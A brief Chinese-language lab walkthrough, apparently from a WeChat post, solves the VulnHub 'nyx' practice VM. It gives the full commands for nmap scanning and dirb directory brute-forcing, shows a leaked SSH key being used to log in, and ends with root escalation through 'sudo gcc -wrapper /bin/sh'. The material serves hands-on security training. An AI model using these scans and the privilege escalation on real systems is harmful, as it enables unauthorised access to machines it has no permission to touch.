今天实践的是vulnhub的nyx镜像,非常简单,
下载地址,https://download.vulnhub.com/nyx/nyxvm.zip,
用workstation导入,console上就显示了靶机的IP地址,192.168.58.160,
省的做地址扫描了,
直接做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.160,
有ssh和web服务,
继续做php文件路径爆破,
dirb http://192.168.58.160/ -X .php,
获取到http://192.168.58.160/key.php,浏览器访问,提示了key,
用nmap的脚本扫描,这是个新技巧,
nmap -sC -sV -p 80 --script=http-enum 192.168.58.160,
获取到新的php文件路径,
http://192.168.58.160/d41d8cd98f00b204e9800998ecf8427e.php,
浏览器访问,并查看源码,(不查看源码只能看到key,看不到用户)
提示了用户mpampis和ssh登录密钥,
在kali攻击机中把密钥放到key文件中,
给可读权限,chmod 600 key,
ssh登录,ssh -i key [email protected],
id确认不是root,继续提权,
sudo -l确认gcc是root权限的,
GTFOBINS搜索到提权方法,
提权,sudo gcc -wrapper /bin/sh,-s .,
id确认是root,
本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束,本期实践到此结束。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之nyx的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论